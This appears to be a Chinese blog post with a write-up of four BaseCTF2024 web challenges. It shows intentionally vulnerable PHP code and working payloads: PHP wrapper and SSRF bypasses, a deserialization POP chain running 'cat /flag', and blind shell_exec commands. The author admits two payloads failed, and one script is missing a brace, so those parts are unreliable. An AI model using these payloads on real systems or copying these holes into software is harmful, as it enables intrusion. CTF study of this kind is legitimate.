<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>BaseCTF2024 | 荒岛</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="1.Aura酱的礼物 1234567891011121314151617181920212223242526 &lt;?phphighlight_file(__FILE__);&#x2F;&#x2F; Aura 酱，欢迎回家~&#x2F;&#x2F; 这里有一份礼物，请你签收一下哟~$pen &#x3D; $_POST[&#x27;pen&#x27;];if (file_get_contents($pen) !&#x3D;&#x3D; &#x27;Aura&amp;#x27">
<meta property="og:type" content="article">
<meta property="og:title" content="BaseCTF2024">
<meta property="og:url" content="http://example.com/2024/11/23/basectf2024/index.html">
<meta property="og:site_name" content="荒岛">
<meta property="og:description" content="1.Aura酱的礼物 1234567891011121314151617181920212223242526 &lt;?phphighlight_file(__FILE__);&#x2F;&#x2F; Aura 酱，欢迎回家~&#x2F;&#x2F; 这里有一份礼物，请你签收一下哟~$pen &#x3D; $_POST[&#x27;pen&#x27;];if (file_get_contents($pen) !&#x3D;&#x3D; &#x27;Aura&amp;#x27">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-11-23T10:34:54.000Z">
<meta property="article:modified_time" content="2024-11-23T10:47:07.179Z">
<meta property="article:author" content="sk57">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="荒岛" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">荒岛</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS 订阅"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="搜索"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-basectf2024" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/11/23/basectf2024/" class="article-date">
  <time class="dt-published" datetime="2024-11-23T10:34:54.000Z" itemprop="datePublished">2024-11-23</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      BaseCTF2024
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>1.Aura酱的礼物</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">// Aura 酱，欢迎回家~</span><br><span class="line">// 这里有一份礼物，请你签收一下哟~</span><br><span class="line">$pen = $_POST[&#x27;pen&#x27;];</span><br><span class="line">if (file_get_contents($pen) !== &#x27;Aura&#x27;)</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27;这是 Aura 的礼物，你不是 Aura！&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 礼物收到啦，接下来要去博客里面写下感想哦~</span><br><span class="line">$challenge = $_POST[&#x27;challenge&#x27;];</span><br><span class="line">if (strpos($challenge, &#x27;http://jasmineaura.github.io&#x27;) !== 0)</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27;这不是 Aura 的博客！&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$blog_content = file_get_contents($challenge);</span><br><span class="line">if (strpos($blog_content, &#x27;已经收到Kengwang的礼物啦&#x27;) === false)</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27;请去博客里面写下感想哦~&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 嘿嘿，接下来要拆开礼物啦，悄悄告诉你，礼物在 flag.php 里面哦~</span><br><span class="line">$gift = $_POST[&#x27;gift&#x27;];</span><br><span class="line">include($gift); </span><br></pre></td></tr></table></figure>

<p>看到file_get_contents($pen) !&#x3D;&#x3D; ‘Aura’直接想到用data伪协议进行绕过，输入pen&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,Aura即可绕过第一个，第二个据说是ssrf漏洞， strpos()函数查找字符串在另一字符串中第一次出现的位置。找到了就返回true ，而若传入<code>url=http://quan9i@127.0.0.1</code>,加上了@这个符号，此时依旧会访问127.0.0.1  因此直接输入&amp;challenge&#x3D;<a target="_blank" rel="noopener" href="http://jasmineaura.github.io@http//gz.imxbt.cn:20905/">http:&#x2F;&#x2F;jasmineaura.github.io@http://gz.imxbt.cn:20905/</a>可以绕过这个，<font style="color:rgb(31,35,41);">第三个的话是⼀个include点,由于我们的flag在注释部分,我们需要将其伪协议和过滤器来进⾏ base64编码后输出php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;flag.php，但是不知道为什么我全部弄完了也无法输出flag，但是过程是这样的，完整pyload：</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pen=data://text/plain,Aura&amp;challenge=http://jasmineaura.github.io@http://gz.imxbt.cn:20905/&amp;gift=php://filter/convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<p>2.Really EZ POP</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">class Sink</span><br><span class="line">&#123;</span><br><span class="line">    private $cmd = &#x27;echo 123;&#x27;;</span><br><span class="line">    public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        eval($this-&gt;cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Shark</span><br><span class="line">&#123;</span><br><span class="line">    private $word = &#x27;Hello, World!&#x27;;</span><br><span class="line">    public function __invoke()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &#x27;Shark says:&#x27; . $this-&gt;word;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Sea</span><br><span class="line">&#123;</span><br><span class="line">    public $animal;</span><br><span class="line">    public function __get($name)</span><br><span class="line">    &#123;</span><br><span class="line">        $sea_ani = $this-&gt;animal;</span><br><span class="line">        echo &#x27;In a deep deep sea, there is a &#x27; . $sea_ani();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Nature</span><br><span class="line">&#123;</span><br><span class="line">    public $sea;</span><br><span class="line"></span><br><span class="line">    public function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo $this-&gt;sea-&gt;see;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if ($_POST[&#x27;nature&#x27;]) &#123;</span><br><span class="line">    $nature = unserialize($_POST[&#x27;nature&#x27;]);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>思路：__destruct调用see会触发__get,get把类当成函数调用会触发__invoke,invoke把类当成字符串调用会触发__tostring,__tortring调用eval函数执行命令，其中<font style="color:#DF2A3F;">private变量无法在函数外调用修改，只能在类内修改定义</font></p>
<p>pyload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">class Sink</span><br><span class="line">&#123;</span><br><span class="line">    private $cmd = &quot;system(&#x27;cat /flag&#x27;);&quot;;</span><br><span class="line"></span><br><span class="line">class Shark</span><br><span class="line">&#123;</span><br><span class="line">    private $word = &#x27;Hello, World!&#x27;;</span><br><span class="line">    public function setword($m)</span><br><span class="line">    &#123;</span><br><span class="line">         $this-&gt;word=$m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Sea</span><br><span class="line">&#123;</span><br><span class="line">    public $animal;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Nature</span><br><span class="line">&#123;</span><br><span class="line">    public $sea;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">$a=new Nature();</span><br><span class="line">$b=new Sea();</span><br><span class="line">$c=new Shark();</span><br><span class="line">$d=new Sink();</span><br><span class="line"></span><br><span class="line">$a-&gt;sea=$b;</span><br><span class="line">$b-&gt;animal=$c;</span><br><span class="line">$c-&gt;setword($d);</span><br><span class="line">echo (serialize($a));</span><br><span class="line">#还是不知道为什么无法输出flag，但是思路和pyload是没错的</span><br></pre></td></tr></table></figure>

<p>3.你听不到我的声音</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">shell_exec($_POST[&#x27;cmd&#x27;]); </span><br></pre></td></tr></table></figure>

<p>shell_exec函数执行命令无回显，本来像要使用system执行输出结果发现不行，使用重定向到1.txt就可以</p>
<p>先输入ls &#x2F; &gt;1.txt发现flag，再cat &#x2F;flag &gt;1.txt，然后到1.txt中找到flag</p>
<p>4.数学大师</p>
<p>直接使用脚本，本人脚本不好，一般是积累</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">import re</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">req=requests.session()</span><br><span class="line">url=&#x27;http://gz.imxbt.cn:20184/&#x27;</span><br><span class="line"></span><br><span class="line">answer=0</span><br><span class="line">while True:</span><br><span class="line">    res=req.post(url=url,data=&#123;&quot;answer&quot;:answer&#125;)</span><br><span class="line">    print(res.text)</span><br><span class="line">    regex=r&quot;(\d*?)(.)(\d*)\?&quot;</span><br><span class="line">    match=re.search(regex,res.text)</span><br><span class="line">    if match.group(2) == &quot;+&quot;:</span><br><span class="line">        answer = int(match.group(1)) + int(match.group(3))</span><br><span class="line">    elif match.group(2) == &quot;-&quot;:</span><br><span class="line">        answer = int(match.group(1)) - int(match.group(3))</span><br><span class="line">    elif match.group(2) == &quot;×&quot;:</span><br><span class="line">        answer = int(match.group(1)) * int(match.group(3))</span><br><span class="line">    elif match.group(2) == &quot;÷&quot;:</span><br><span class="line">        answer = int(match.group(1)) // int(match.group(3))</span><br><span class="line">    if &quot;BaseCTF&quot; in res.text:</span><br><span class="line">        print(res.text)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/11/23/basectf2024/" data-id="cm3l98c7l000008vbbjxecvin" data-title="BaseCTF2024" class="article-share-link"><span class="fa fa-share">分享</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2024/11/17/%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0-1/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">测试文章</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/11/">十一月 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/11/23/basectf2024/">BaseCTF2024</a>
          </li>
        
          <li>
            <a href="/2024/11/17/%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0-1/">测试文章</a>
          </li>
        
          <li>
            <a href="/2024/11/15/%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0/">测试文章</a>
          </li>
        
          <li>
            <a href="/2024/11/08/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 sk57<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>